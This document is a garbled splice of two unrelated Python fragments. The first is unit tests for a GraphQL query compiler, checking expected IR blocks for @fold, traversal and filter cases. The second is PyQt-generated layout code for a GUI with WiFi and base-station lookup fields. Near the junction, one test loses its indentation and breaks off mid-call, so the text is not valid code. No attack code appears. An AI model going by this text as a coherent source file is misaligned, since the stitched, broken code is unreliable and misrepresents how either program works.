            blocks.Traverse('out', 'Animal_ParentOf', optional=True),
            blocks.MarkLocation(child_location),
            blocks.EndOptional(),
            blocks.Backtrack(animal_location, optional=True),
            blocks.MarkLocation(revisited_animal_location),
            blocks.Backtrack(base_location),
            blocks.ConstructResult({
                'species_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'parent_name': expressions.OutputContextField(
                    animal_location.navigate_to_field('name'), GraphQLString),
                'child_name': expressions.TernaryConditional(
                    expressions.ContextFieldExistence(child_location),
                    expressions.OutputContextField(
                        child_location.navigate_to_field('name'), GraphQLString),
                    expressions.NullLiteral),
            }),
        ]
        expected_location_types = {
            base_location: 'Species',
            animal_location: 'Animal',
            child_location: 'Animal',
            revisited_animal_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_has_edge_degree_op_filter_with_fold(self):
        """A has_edge_degree filter combined with a @fold of the same edge."""
        test_data = test_input_data.has_edge_degree_op_filter_with_fold()
        base_location = helpers.Location(('Species',))
        animal_location = base_location.navigate_to_subpath('in_Animal_OfSpecies')
        animal_fold = helpers.FoldScopeLocation(animal_location, ('out', 'Animal_ParentOf'))
        expected_blocks = [
            blocks.QueryRoot({'Species'}),
            blocks.MarkLocation(base_location),
            blocks.Traverse('in', 'Animal_OfSpecies'),
            blocks.Filter(
                expressions.BinaryComposition(
                    u'||',
                    expressions.BinaryComposition(  # the zero-edge check
                        u'&&',
                        expressions.BinaryComposition(
                            u'=',
                            expressions.Variable('$child_count', GraphQLInt),
                            expressions.ZeroLiteral
                        ),
                        expressions.BinaryComposition(
                            u'=',
                            expressions.LocalField('out_Animal_ParentOf'),
                            expressions.NullLiteral
                        )
                    ),
                    expressions.BinaryComposition(  # the non-zero-edge check
                        u'&&',
                        expressions.BinaryComposition(
                            u'!=',
                            expressions.LocalField('out_Animal_ParentOf'),
                            expressions.NullLiteral
                        ),
                        expressions.BinaryComposition(
                            u'=',
                            expressions.UnaryTransformation(
                                u'size',
                                expressions.LocalField('out_Animal_ParentOf')
                            ),
                            expressions.Variable('$child_count', GraphQLInt),
                        )
                    )
                )
            ),
            blocks.MarkLocation(animal_location),
            blocks.Fold(animal_fold),
            blocks.Unfold(),
            blocks.Backtrack(base_location),
            blocks.ConstructResult({
                'species_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'parent_name': expressions.OutputContextField(
                    animal_location.navigate_to_field('name'), GraphQLString),
                'child_names': expressions.FoldedOutputContextField(
                    animal_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            base_location: 'Species',
            animal_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_fold_on_output_variable(self):
        """A simple @fold whose folded field is emitted as a list output."""
        test_data = test_input_data.fold_on_output_variable()
        base_location = helpers.Location(('Animal',))
        base_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_fold),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'child_names_list': expressions.FoldedOutputContextField(
                    base_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_fold_after_traverse(self):
        """A @fold opened inside a scope reached via a prior traversal."""
        test_data = test_input_data.fold_after_traverse()
        base_location = helpers.Location(('Animal',))
        parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        parent_fold = helpers.FoldScopeLocation(parent_location, ('out', 'Animal_ParentOf'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Traverse('in', 'Animal_ParentOf'),
            blocks.MarkLocation(parent_location),
            blocks.Fold(parent_fold),
            blocks.Unfold(),
            blocks.Backtrack(base_location),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'sibling_and_self_names_list': expressions.FoldedOutputContextField(
                    parent_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
            parent_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_fold_and_traverse(self):
        """A @fold that itself contains a traversal within the folded scope."""
        test_data = test_input_data.fold_and_traverse()
        base_location = helpers.Location(('Animal',))
        parent_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
        parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(parent_fold),
            blocks.Traverse('out', 'Animal_ParentOf'),
            blocks.Backtrack(parent_location),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'sibling_and_self_names_list': expressions.FoldedOutputContextField(
                    parent_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_fold_and_deep_traverse(self):
        """A @fold containing a multi-step traversal within the folded scope."""
        test_data = test_input_data.fold_and_deep_traverse()
        base_location = helpers.Location(('Animal',))
        parent_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
        parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        sibling_location = parent_location.navigate_to_subpath('out_Animal_ParentOf')
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(parent_fold),
            blocks.Traverse('out', 'Animal_ParentOf'),
            blocks.Traverse('out', 'Animal_OfSpecies'),
            blocks.Backtrack(sibling_location),
            blocks.Backtrack(parent_location),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'sibling_and_self_species_list': expressions.FoldedOutputContextField(
                    parent_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_traverse_and_fold_and_traverse(self):
        """A traversal, then a @fold whose folded scope performs a further traversal."""
        test_data = test_input_data.traverse_and_fold_and_traverse()
        base_location = helpers.Location(('Animal',))
        parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        sibling_fold = helpers.FoldScopeLocation(parent_location, ('out', 'Animal_ParentOf'))
        sibling_location = parent_location.navigate_to_subpath('out_Animal_ParentOf')
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Traverse('in', 'Animal_ParentOf'),
            blocks.MarkLocation(parent_location),
            blocks.Fold(sibling_fold),
            blocks.Traverse('out', 'Animal_OfSpecies'),
            blocks.Backtrack(sibling_location),
            blocks.Unfold(),
            blocks.Backtrack(base_location),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'sibling_and_self_species_list': expressions.FoldedOutputContextField(
                    sibling_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
            parent_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_multiple_outputs_in_same_fold(self):
        """Two different fields output from a single @fold scope."""
        test_data = test_input_data.multiple_outputs_in_same_fold()
        base_location = helpers.Location(('Animal',))
        base_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_fold),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'child_names_list': expressions.FoldedOutputContextField(
                    base_fold, 'name', GraphQLList(GraphQLString)),
                'child_uuids_list': expressions.FoldedOutputContextField(
                    base_fold, 'uuid', GraphQLList(GraphQLID)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_multiple_outputs_in_same_fold_and_traverse(self):
        """Two outputs from one @fold whose folded scope also traverses an edge."""
        test_data = test_input_data.multiple_outputs_in_same_fold_and_traverse()
        base_location = helpers.Location(('Animal',))
        base_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
        parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_fold),
            blocks.Traverse('out', 'Animal_ParentOf'),
            blocks.Backtrack(parent_location),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'sibling_and_self_names_list': expressions.FoldedOutputContextField(
                    base_fold, 'name', GraphQLList(GraphQLString)),
                'sibling_and_self_uuids_list': expressions.FoldedOutputContextField(
                    base_fold, 'uuid', GraphQLList(GraphQLID)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_multiple_folds(self):
        """Two sibling @fold scopes (outbound and inbound) on the same root."""
        test_data = test_input_data.multiple_folds()
        base_location = helpers.Location(('Animal',))
        base_out_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
        base_in_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_out_fold),
            blocks.Unfold(),
            blocks.Fold(base_in_fold),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'child_names_list': expressions.FoldedOutputContextField(
                    base_out_fold, 'name', GraphQLList(GraphQLString)),
                'child_uuids_list': expressions.FoldedOutputContextField(
                    base_out_fold, 'uuid', GraphQLList(GraphQLID)),
                'parent_names_list': expressions.FoldedOutputContextField(
                    base_in_fold, 'name', GraphQLList(GraphQLString)),
                'parent_uuids_list': expressions.FoldedOutputContextField(
                    base_in_fold, 'uuid', GraphQLList(GraphQLID)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_multiple_folds_and_traverse(self):
        """Two sibling @fold scopes, each performing a traversal inside the fold."""
        test_data = test_input_data.multiple_folds_and_traverse()
        base_location = helpers.Location(('Animal',))
        base_out_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
        base_out_location = base_location.navigate_to_subpath('out_Animal_ParentOf')
        base_in_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
        base_in_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_out_fold),
            blocks.Traverse('in', 'Animal_ParentOf'),
            blocks.Backtrack(base_out_location),
            blocks.Unfold(),
            blocks.Fold(base_in_fold),
            blocks.Traverse('out', 'Animal_ParentOf'),
            blocks.Backtrack(base_in_location),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'spouse_and_self_names_list': expressions.FoldedOutputContextField(
                    base_out_fold, 'name', GraphQLList(GraphQLString)),
                'spouse_and_self_uuids_list': expressions.FoldedOutputContextField(
                    base_out_fold, 'uuid', GraphQLList(GraphQLID)),
                'sibling_and_self_names_list': expressions.FoldedOutputContextField(
                    base_in_fold, 'name', GraphQLList(GraphQLString)),
                'sibling_and_self_uuids_list': expressions.FoldedOutputContextField(
                    base_in_fold, 'uuid', GraphQLList(GraphQLID)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_fold_date_and_datetime_fields(self):
        """Folded outputs of Date and DateTime typed fields."""
        test_data = test_input_data.fold_date_and_datetime_fields()
        base_location = helpers.Location(('Animal',))
        base_parent_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
        base_fed_at_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_FedAt'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_parent_fold),
            blocks.Unfold(),
            blocks.Fold(base_fed_at_fold),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'child_birthdays_list': expressions.FoldedOutputContextField(
                    base_parent_fold, 'birthday', GraphQLList(GraphQLDate)),
                'fed_at_datetimes_list': expressions.FoldedOutputContextField(
                    base_fed_at_fold, 'event_date', GraphQLList(GraphQLDateTime)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_coercion_to_union_base_type_inside_fold(self):
        """Coercion to a union's base type inside a @fold is optimized away."""
        # Given type_equivalence_hints = { Event: EventOrBirthEvent },
        # the coercion should be optimized away as a no-op.
        test_data = test_input_data.coercion_to_union_base_type_inside_fold()
        base_location = helpers.Location(('Animal',))
        base_parent_fold = helpers.FoldScopeLocation(
            base_location, ('out', 'Animal_ImportantEvent'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_parent_fold),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'important_events': expressions.FoldedOutputContextField(
                    base_parent_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_coercion_filters_and_multiple_outputs_within_fold_scope(self):
        """A type coercion, two filters, and multiple outputs all inside one @fold."""
        test_data = test_input_data.coercion_filters_and_multiple_outputs_within_fold_scope()
        base_location = helpers.Location(('Animal',))
        entity_fold = helpers.FoldScopeLocation(base_location, ('out', 'Entity_Related'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(entity_fold),
            blocks.CoerceType({'Animal'}),
            blocks.Filter(expressions.BinaryComposition(
                u'has_substring',
                expressions.LocalField('name'),
                expressions.Variable('$substring', GraphQLString)
            )),
            blocks.Filter(
                expressions.BinaryComposition(
                    u'<=',
                    expressions.LocalField('birthday'),
                    expressions.Variable('$latest', GraphQLDate)
                )
            ),
            blocks.Unfold(),
            blocks.ConstructResult({
                'related_animals': expressions.FoldedOutputContextField(
                    entity_fold, 'name', GraphQLList(GraphQLString)),
                'name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'related_birthdays': expressions.FoldedOutputContextField(
                    entity_fold, 'birthday', GraphQLList(GraphQLDate)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_coercion_filters_and_multiple_outputs_within_fold_traversal(self):
        """Coercion, filters, and multiple outputs inside a traversal within a @fold."""
        test_data = test_input_data.coercion_filters_and_multiple_outputs_within_fold_traversal()
        base_location = helpers.Location(('Animal',))
        parent_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
        parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(parent_fold),
            blocks.Traverse('out', 'Entity_Related'),
            blocks.CoerceType({'Animal'}),
            blocks.Filter(expressions.BinaryComposition(
                u'has_substring',
                expressions.LocalField('name'),
                expressions.Variable('$substring', GraphQLString)
            )),
            blocks.Filter(
                expressions.BinaryComposition(
                    u'<=',
                    expressions.LocalField('birthday'),
                    expressions.Variable('$latest', GraphQLDate)
                )
            ),
            blocks.Backtrack(parent_location),
            blocks.Unfold(),
            blocks.ConstructResult({
                'related_animals': expressions.FoldedOutputContextField(
                    parent_fold, 'name', GraphQLList(GraphQLString)),
                'name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'related_birthdays': expressions.FoldedOutputContextField(
                    parent_fold, 'birthday', GraphQLList(GraphQLDate)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_no_op_coercion_inside_fold(self):
        """A coercion to the scope's own type inside a @fold emits no CoerceType block."""
        # The type where the coercion is applied is already Entity, so the coercion is a no-op.
        test_data = test_input_data.no_op_coercion_inside_fold()
        base_location = helpers.Location(('Animal',))
        base_parent_fold = helpers.FoldScopeLocation(
            base_location, ('out', 'Entity_Related'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_parent_fold),
            blocks.Unfold(),
            blocks.ConstructResult({
                'animal_name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'related_entities': expressions.FoldedOutputContextField(
                    base_parent_fold, 'name', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_filter_within_fold_scope(self):
        """A field filter applied to vertices inside a @fold scope."""
        test_data = test_input_data.filter_within_fold_scope()
        base_location = helpers.Location(('Animal',))
        base_parent_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
        expected_blocks = [
            blocks.QueryRoot({'Animal'}),
            blocks.MarkLocation(base_location),
            blocks.Fold(base_parent_fold),
            blocks.Filter(
                expressions.BinaryComposition(
                    u'=',
                    expressions.LocalField('name'),
                    expressions.Variable('$desired', GraphQLString)
                )
            ),
            blocks.Unfold(),
            blocks.ConstructResult({
                'name': expressions.OutputContextField(
                    base_location.navigate_to_field('name'), GraphQLString),
                'child_list': expressions.FoldedOutputContextField(
                    base_parent_fold, 'name', GraphQLList(GraphQLString)),
                'child_descriptions': expressions.FoldedOutputContextField(
                    base_parent_fold, 'description', GraphQLList(GraphQLString)),
            }),
        ]
        expected_location_types = {
            # No MarkLocation blocks are output within folded scopes.
            base_location: 'Animal',
        }
        check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_filter_on_fold_scope(self):
test_data = test_input_data.filter_on_fold_scope()
base_location = helpers.Location(('Animal',))
base_parent_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_parent_fold),
blocks.Filter(
expressions.BinaryComposition(
u'||',
expressions.BinaryComposition(
u'=',
expressions.LocalField('name'),
expressions.Variable('$desired', GraphQLString)
),
expressions.BinaryComposition(
u'contains',
expressions.LocalField('alias'),
expressions.Variable('$desired', GraphQLString)
)
)
),
blocks.Unfold(),
blocks.ConstructResult({
'name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_list': expressions.FoldedOutputContextField(
base_parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, | |
self.main_tbShowWifi = QtWidgets.QTextBrowser(self.groupBox_16)
font = QtGui.QFont()
font.setPointSize(9)
self.main_tbShowWifi.setFont(font)
self.main_tbShowWifi.setObjectName("main_tbShowWifi")
self.verticalLayout_58.addWidget(self.main_tbShowWifi)
self.verticalLayout_11.addLayout(self.verticalLayout_58)
self.groupBox_2 = QtWidgets.QGroupBox(self.splitter_13)
self.groupBox_2.setMaximumSize(QtCore.QSize(400, 16777215))
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_10 = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.splitter_5 = QtWidgets.QSplitter(self.groupBox_2)
self.splitter_5.setOrientation(QtCore.Qt.Vertical)
self.splitter_5.setObjectName("splitter_5")
self.layoutWidget6 = QtWidgets.QWidget(self.splitter_5)
self.layoutWidget6.setObjectName("layoutWidget6")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.layoutWidget6)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.verticalLayout_31 = QtWidgets.QVBoxLayout()
self.verticalLayout_31.setObjectName("verticalLayout_31")
self.label_3 = QtWidgets.QLabel(self.layoutWidget6)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.verticalLayout_31.addWidget(self.label_3)
self.verticalLayout_30 = QtWidgets.QVBoxLayout()
self.verticalLayout_30.setObjectName("verticalLayout_30")
self.horizontalLayout_23 = QtWidgets.QHBoxLayout()
self.horizontalLayout_23.setObjectName("horizontalLayout_23")
self.label_5 = QtWidgets.QLabel(self.layoutWidget6)
self.label_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_5.setObjectName("label_5")
self.horizontalLayout_23.addWidget(self.label_5)
self.main_editLAT_FindBS = QtWidgets.QLineEdit(self.layoutWidget6)
self.main_editLAT_FindBS.setMinimumSize(QtCore.QSize(80, 0))
self.main_editLAT_FindBS.setMaximumSize(QtCore.QSize(140, 16777215))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.main_editLAT_FindBS.setFont(font)
self.main_editLAT_FindBS.setAlignment(QtCore.Qt.AlignCenter)
self.main_editLAT_FindBS.setClearButtonEnabled(False)
self.main_editLAT_FindBS.setObjectName("main_editLAT_FindBS")
self.horizontalLayout_23.addWidget(self.main_editLAT_FindBS)
spacerItem31 = QtWidgets.QSpacerItem(10, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_23.addItem(spacerItem31)
self.main_editLON_FindBS = QtWidgets.QLineEdit(self.layoutWidget6)
self.main_editLON_FindBS.setMinimumSize(QtCore.QSize(80, 0))
self.main_editLON_FindBS.setMaximumSize(QtCore.QSize(140, 16777215))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.main_editLON_FindBS.setFont(font)
self.main_editLON_FindBS.setAlignment(QtCore.Qt.AlignCenter)
self.main_editLON_FindBS.setClearButtonEnabled(False)
self.main_editLON_FindBS.setObjectName("main_editLON_FindBS")
self.horizontalLayout_23.addWidget(self.main_editLON_FindBS)
spacerItem32 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_23.addItem(spacerItem32)
self.verticalLayout_30.addLayout(self.horizontalLayout_23)
self.horizontalLayout_26 = QtWidgets.QHBoxLayout()
self.horizontalLayout_26.setObjectName("horizontalLayout_26")
self.horizontalLayout_25 = QtWidgets.QHBoxLayout()
self.horizontalLayout_25.setObjectName("horizontalLayout_25")
self.label_4 = QtWidgets.QLabel(self.layoutWidget6)
self.label_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setObjectName("label_4")
self.horizontalLayout_25.addWidget(self.label_4)
self.main_editRadius = QtWidgets.QLineEdit(self.layoutWidget6)
self.main_editRadius.setMaximumSize(QtCore.QSize(50, 16777215))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.main_editRadius.setFont(font)
self.main_editRadius.setAlignment(QtCore.Qt.AlignCenter)
self.main_editRadius.setClearButtonEnabled(False)
self.main_editRadius.setObjectName("main_editRadius")
self.horizontalLayout_25.addWidget(self.main_editRadius)
spacerItem33 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_25.addItem(spacerItem33)
self.horizontalLayout_26.addLayout(self.horizontalLayout_25)
self.main_check_mapShow = QtWidgets.QCheckBox(self.layoutWidget6)
self.main_check_mapShow.setObjectName("main_check_mapShow")
self.horizontalLayout_26.addWidget(self.main_check_mapShow)
self.verticalLayout_30.addLayout(self.horizontalLayout_26)
self.verticalLayout_31.addLayout(self.verticalLayout_30)
self.verticalLayout_6.addLayout(self.verticalLayout_31)
self.horizontalLayout_24 = QtWidgets.QHBoxLayout()
self.horizontalLayout_24.setObjectName("horizontalLayout_24")
self.label_13 = QtWidgets.QLabel(self.layoutWidget6)
self.label_13.setObjectName("label_13")
self.horizontalLayout_24.addWidget(self.label_13)
self.cb_ModeBTSShowing = QtWidgets.QComboBox(self.layoutWidget6)
self.cb_ModeBTSShowing.setObjectName("cb_ModeBTSShowing")
self.cb_ModeBTSShowing.addItem("")
self.cb_ModeBTSShowing.addItem("")
self.horizontalLayout_24.addWidget(self.cb_ModeBTSShowing)
spacerItem34 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_24.addItem(spacerItem34)
self.main_pb_ShowBStations = QtWidgets.QPushButton(self.layoutWidget6)
self.main_pb_ShowBStations.setMinimumSize(QtCore.QSize(100, 0))
self.main_pb_ShowBStations.setMaximumSize(QtCore.QSize(100, 23))
self.main_pb_ShowBStations.setAutoRepeat(False)
self.main_pb_ShowBStations.setAutoDefault(False)
self.main_pb_ShowBStations.setDefault(False)
self.main_pb_ShowBStations.setFlat(False)
self.main_pb_ShowBStations.setObjectName("main_pb_ShowBStations")
self.horizontalLayout_24.addWidget(self.main_pb_ShowBStations)
self.main_pb_clearShowBStations = QtWidgets.QPushButton(self.layoutWidget6)
self.main_pb_clearShowBStations.setMinimumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBStations.setMaximumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBStations.setText("")
self.main_pb_clearShowBStations.setObjectName("main_pb_clearShowBStations")
self.horizontalLayout_24.addWidget(self.main_pb_clearShowBStations)
spacerItem35 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_24.addItem(spacerItem35)
self.verticalLayout_6.addLayout(self.horizontalLayout_24)
self.tbrwsr_ShowBStations = QtWidgets.QTextBrowser(self.layoutWidget6)
self.tbrwsr_ShowBStations.setObjectName("tbrwsr_ShowBStations")
self.verticalLayout_6.addWidget(self.tbrwsr_ShowBStations)
self.layoutWidget7 = QtWidgets.QWidget(self.splitter_5)
self.layoutWidget7.setObjectName("layoutWidget7")
self.verticalLayout_8 = QtWidgets.QVBoxLayout(self.layoutWidget7)
self.verticalLayout_8.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.line_3 = QtWidgets.QFrame(self.layoutWidget7)
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.verticalLayout_8.addWidget(self.line_3)
self.verticalLayout_7 = QtWidgets.QVBoxLayout()
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.horizontalLayout_19 = QtWidgets.QHBoxLayout()
self.horizontalLayout_19.setObjectName("horizontalLayout_19")
spacerItem36 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_19.addItem(spacerItem36)
self.label_6 = QtWidgets.QLabel(self.layoutWidget7)
self.label_6.setObjectName("label_6")
self.horizontalLayout_19.addWidget(self.label_6)
spacerItem37 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_19.addItem(spacerItem37)
self.verticalLayout_7.addLayout(self.horizontalLayout_19)
self.splitter_3 = QtWidgets.QSplitter(self.layoutWidget7)
self.splitter_3.setOrientation(QtCore.Qt.Horizontal)
self.splitter_3.setObjectName("splitter_3")
self.layoutWidget8 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget8.setObjectName("layoutWidget8")
self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.layoutWidget8)
self.horizontalLayout_7.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
spacerItem38 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_7.addItem(spacerItem38)
self.label_9 = QtWidgets.QLabel(self.layoutWidget8)
self.label_9.setObjectName("label_9")
self.horizontalLayout_7.addWidget(self.label_9)
self.le_BTSGeo_mcc = QtWidgets.QLineEdit(self.layoutWidget8)
self.le_BTSGeo_mcc.setText("")
self.le_BTSGeo_mcc.setMaxLength(999999999)
